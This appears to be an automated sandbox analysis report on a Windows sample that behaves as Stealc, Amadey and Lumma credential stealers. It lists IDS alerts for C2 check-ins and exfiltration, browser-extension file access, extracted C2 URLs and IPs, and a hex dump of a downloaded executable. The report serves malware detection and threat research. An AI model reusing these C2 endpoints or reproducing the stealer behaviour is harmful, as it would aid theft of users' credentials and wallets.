Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C784420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C784420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B44C0 PK11_PubEncrypt,	0_2_6C7B44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C8025B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C798670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C798670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C7BA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C79E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C7DA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C7E0180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B43B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6C7B43B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6C7D7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C797D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6C797D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6C7DBD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6C7D9EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B3FF0 PK11_PrivDecryptPKCS1,	0_2_6C7B3FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C7B3850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6C7B9840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DDA40 SEC_PKCS7ContentIsEncrypted,	0_2_6C7DDA40

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49819 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 40.126.32.76:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50136 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50143 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50148 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50154 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50158 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50198 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50212 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50215 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50250 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.17:443 -> 192.168.2.5:50352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:50394 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2700275828.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 06d4af6f50.exe, 0000001A.00000003.3715728516.0000000007C20000.00000004.00001000.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3811262095.0000000005C42000.00000040.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3802419409.0000000008860000.00000004.00001000.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000002.3906608143.0000000006432000.00000040.00000800.00020000.00000000.sdmp, ea44ea94c2.exe, 0000001F.00000003.3603714259.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, ea44ea94c2.exe, 0000001F.00000002.3739108759.0000000000CD2000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2700275828.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp

Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe

Directory queried: number of queries: 3003

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49720 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49720 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49720
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49720 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49720
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49720 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50138 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50139
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50141 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.5:55701 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50143 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50144 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50146 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50148 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50151 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50150 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50156 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50158 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50162 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50163 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50164 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50165 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50166 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50169 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50168 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50167 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50149 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50172 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50155 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50171 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50174 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50180 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50183 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50185 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50193 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50198 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50202 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50204 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50212 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.5:50215 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.5:59836 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.5:55305 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50222 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.5:50572 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.5:53800 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.5:55787 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.5:57470 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50146 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50146 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50148 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50162 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50162 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50143 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50143 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50169 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50164 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50164 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50180 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50183 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50183 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50193 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50212 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50163 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50174 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50215 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50185 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50185 -> 172.67.174.133:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: https://frogmen-smell.sbs/api
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic

TCP traffic: 192.168.2.5:50147 -> 87.120.125.16:9891

Source: global traffic

TCP traffic: 192.168.2.5:49860 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Nov 2024 19:39:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 